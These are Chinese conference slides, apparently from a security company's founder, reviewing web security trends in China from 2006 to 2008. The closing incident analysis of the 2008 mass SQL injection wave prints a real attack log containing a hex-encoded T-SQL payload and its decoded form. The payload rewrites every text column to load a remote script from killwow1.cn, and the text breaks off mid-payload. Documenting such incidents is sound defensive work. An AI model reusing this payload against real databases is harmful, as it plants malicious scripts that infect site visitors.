纵观中国WEB安全5年发展历程及趋势与挑战-安恒明鉴非法网

纵观中国WEB安全5年发展历程及趋势与挑战•Frank.Fan(范渊)&DBAPPSecuritySec-Team•OWASP中国分会副会长•FounderandCTOofDBAPPSecurity(安恒信息)•Frank.Fan@DBAPPSecurity.com.cn自我介绍•FrankCEO&CTO杭州安恒信息技术有限公司–毕业于美国加州大学计算机科学系–国际著名安全公司十多年的技术研发和项目管理–对应用安全、数据库安全和审计、compliance(如SOX,PCI,ISO17799/27001)有着非常资深经验–第一个登上黑帽子安全大会演讲的中国人–CISSP,CISA,GCIH,GCIA–OWASP中国分会副会长–2008北京奥组委安全组成员–浙江省信息安全协会安全服务委员会主任–2009年度网络战专题最具影响力人物目录•5年WEB应用安全的发展历程•未来发展趋势与挑战•Q&A2006年回顾•与05年同期相比，06年网络攻击事件要高出一倍之多且web应用攻击上升截止到2006年12月25日，据不完全统计，中国网络发生的网络攻击事件中，脚本入侵比例为53%，拒绝服务攻击比例为26%，漏洞利用比例为13%，暴力猜解比例为8%，社会工程学比例为5%，其他方法为1%。但与05年同期相比，2006年度网络攻击事件要高出一倍之多。06年全年，据不完全统计，自2006年1月1日起，截止2006年12月25日，中国网站被篡改的数量达25820个。其中政府类网站有3661个；企业类网站为11828个（其中博客运营类被黑数量达到1683个）；教育\培训类被黑网站数量达到2216个，其中：中、职专及中小学网站占百分之73.5%（1628个），大学网站的二级网站占18.0%（398个），培训类机构127个，大学一级域名站点为63个。2006回顾•自动化web弱点扫描工具安恒安全专家团队在深入分析研究B/S架构应用系统中典型安全漏洞以及流行攻击技术基础上研制明鉴TMWEB应用弱点扫描器（简称：MatriXay）于2006年8月在世界安全大会BlackHat和Def-Con上首次发布，开启了国内WEB应用弱点扫描器的先河。而且该扫描器与同期国外同类产品的不同之处在于：不仅具有非凡的扫描功能，还提供了强大的渗透测试、网页木马检测功能。2007年度回顾•电脑病毒/木马传播的WEB2.0化Web2.0给网民带来全新的上网体验，web2.0的内容源不再由少数专业人士发布，任何人都可以成为内容源的发布者，这为那些别有用心的攻击者提供了更多的机会——各种恶意代码以热门事件为幌子被传输到网络上等待被下载。众多BLOG、论坛、社区、视频网站成为病毒泛滥和传播的温床。Web2.0程序本身存在的威胁也是新的安全课题，安全厂商注意到myspace蠕虫和百度空间蠕虫是新蠕虫的代表。跨站点脚本攻击，变得越来越普及，因为黑客们已经发现了这类攻击的作用和好处。攻击者可以在用户毫不知情的情况下造成许多危害，其中包括强迫PC下载非法内容、侵入其他Web站点或发送电子邮件等。利用AJAX，在后台无声无息地传递数据，很难被发现，为AJAX蠕虫隐身传播带来了绝佳的便利！其中百度空间蠕虫源码已经公布。2007年度回顾入侵企业服务器出售收费传播流氓软件获取金钱拒绝服务攻击发送垃圾邮件盗取网上银行账户组建僵尸网络主动攻击勒索网站受雇攻击收取佣金批量入侵门户网站盗取虚拟财产窃取机密信息(图纸、财务报表等）盗取个人信息盗取证券交易账户出售洗钱•“工业化”入侵凸显地下黑客产业链2008年度回顾•北京奥运会的胜利举办2008北京奥运会，作为具有巨大影响力的全球性盛会之一，其安全防护工作贯穿盛会始终，更是奥运基础工作中的重中之重。而2008北京奥组委官方网站，在当今的互联网时代，其在会议前后发挥的作用是不言而喻的，一些国内外分裂势力、邪教分子、藏独分子、国外反华势力在奥运期间很有可能对网站发起攻击，实行破坏活动，借此引起全世界的注意，给各方面带来压力。奥组委技术部门充分意识到网站信息安全形势的严峻，通过各种方式对网站安全问题做了很多的工作。安恒信息作为国内应用安全和数据库安全的领航者，凭借公司雄厚的技术实力和应用安全领域的丰富经验，成为奥运安全保障技术支持单位。2008年度回顾•网路群注风暴2008年5月，安恒安全研究服务团队在某网站应急响应中首次发现并处理了全球性的网站群注风暴攻击，并且在国内首家发布了红色预警。
网络群注(MassInjection),可以简单翻译为巨量的SQL注入(SQLInjection)。SQL注入是一种目前最流行的利用网站应用程序漏洞对数据库以及服务器进行攻击的手段，这种攻击可能是窃取数据、插入数据、篡改数据、删除数据或者执行任意命令以致直接控制服务器。
这类攻击适用范围极为广泛，目前80%以上的网站挂马是出自这类攻击，而群注则在单个网站攻击的基础上在自动化和智能性方面更进了一步，也就是说,从发现网站目标到发现漏洞点到注射木马，全自动一气呵成,效率极高，很多国外著名的安全网站也惨遭毒手,更不用说是国内的许许多多防范不严的网站了。•11群注风暴深度回顾MassInjectionToolRevealed•HowdidDBAPPSecuritySecTeamfindit?–FromaBotMachineduringIncidentHandling•12Realcaseinincidenthandling!•2008-05-1300:28:25W3SVC62824993722.1.1.11POST/news_default.asptid=117;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--80-204.13.70.223Mozilla/3.0+(compatible;+Indy+Library)20000•13Realcontent…•DECLARE@Tvarchar(255),@Cvarchar(255)DECLARETable_CursorCURSORFORselecta.name,b.namefromsysobjectsa,syscolumnsbwherea.id=b.idanda.xtype='u'and(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)OPENTable_CursorFETCHNEXTFROMTable_CursorINTO@T,@CWHILE(@@FETCH_STATUS=0)BEGINexec('update['+@T+']set['+@C+']=rtrim(convert(varchar,['+@C+']))+''scriptsrc=)FETCHNEXTFROMTable_CursorINTO@T,@CENDCLOSETable_Curs